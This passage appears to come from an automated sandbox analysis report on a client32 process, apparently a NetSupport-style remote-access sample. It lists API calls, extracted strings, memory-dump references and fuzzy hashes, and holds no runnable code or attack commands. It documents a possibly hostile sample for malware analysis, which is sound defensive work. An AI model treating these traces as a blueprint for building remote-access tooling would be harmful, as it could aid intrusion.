                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                        • Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                        • Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
                                                                                                                        • Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                        • Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                          • Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
                                                                                                                          • Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B
                                                                                                                          • Part of subcall function 6859A4E0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
                                                                                                                          • Part of subcall function 6859A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
                                                                                                                          • Part of subcall function 6859A4E0: Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
                                                                                                                          • Part of subcall function 6859A4E0: LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                        • String ID: 1.2$BlZh$Channel$Client$Publish %d pending services
                                                                                                                        • API String ID: 1112461860-429780693
                                                                                                                        • Opcode ID: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                        • Instruction ID: 5d3ed0157c170679b21c14aa78076d12a51ce1c935d438aa56610adfde399586
                                                                                                                        • Opcode Fuzzy Hash: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
                                                                                                                        • Instruction Fuzzy Hash: AA51AD35A043498FEF10DB7CD894BAE7BE5AB46308F910129DE6193281EB31ED45CB99
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                        • API String ID: 3494822531-1878648853
                                                                                                                        • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                        • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                        • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                        • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                        • std::exception::exception.LIBCMT ref: 11104424
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11104439
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                        • API String ID: 1187064156-2390547818
                                                                                                                        • Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                        • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                        • Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                        • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • Client, xrefs: 11135C15
                                                                                                                        • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
                                                                                                                        • AutoICFConfig, xrefs: 11135C10
                                                                                                                        • DoICFConfig() OK, xrefs: 11135C96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick
                                                                                                                        • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                        • API String ID: 536389180-1512301160
                                                                                                                        • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                        • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                        • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                        • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                        APIs
                                                                                                                        • send.WSOCK32(?,?,?,00000000), ref: 68599C93
                                                                                                                        • timeGetTime.WINMM(?,?,?,00000000), ref: 68599CD0
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 68599CDE
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 68599D4F
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 68599D72
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                        • String ID: 3'
                                                                                                                        • API String ID: 77915721-280543908
                                                                                                                        • Opcode ID: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
                                                                                                                        • Instruction ID: 236607c0a8a5709804ead984073072827bcf7aa643f65f3bb03ea8ca8f484ff1
                                                                                                                        • Opcode Fuzzy Hash: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
                                                                                                                        • Instruction Fuzzy Hash: 63216D75A042288FDF20DF64CC88B9AB7B8AF45314F4542D5E91D9B281CA30ED84CF91
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                        • API String ID: 4186647306-532032230
                                                                                                                        • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                        • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                        • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                        • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
                                                                                                                        • CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                        • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                        • API String ID: 3360349984-1136101629
                                                                                                                        • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                        • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                        • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                        • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: %s%s%s.bin$226546$_HF$_HW$_SW
                                                                                                                        • API String ID: 2111968516-1464289686
                                                                                                                        • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                        • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                        • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                        • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                        APIs
                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                        • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                        • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                        • String ID: NSMDesktopWnd
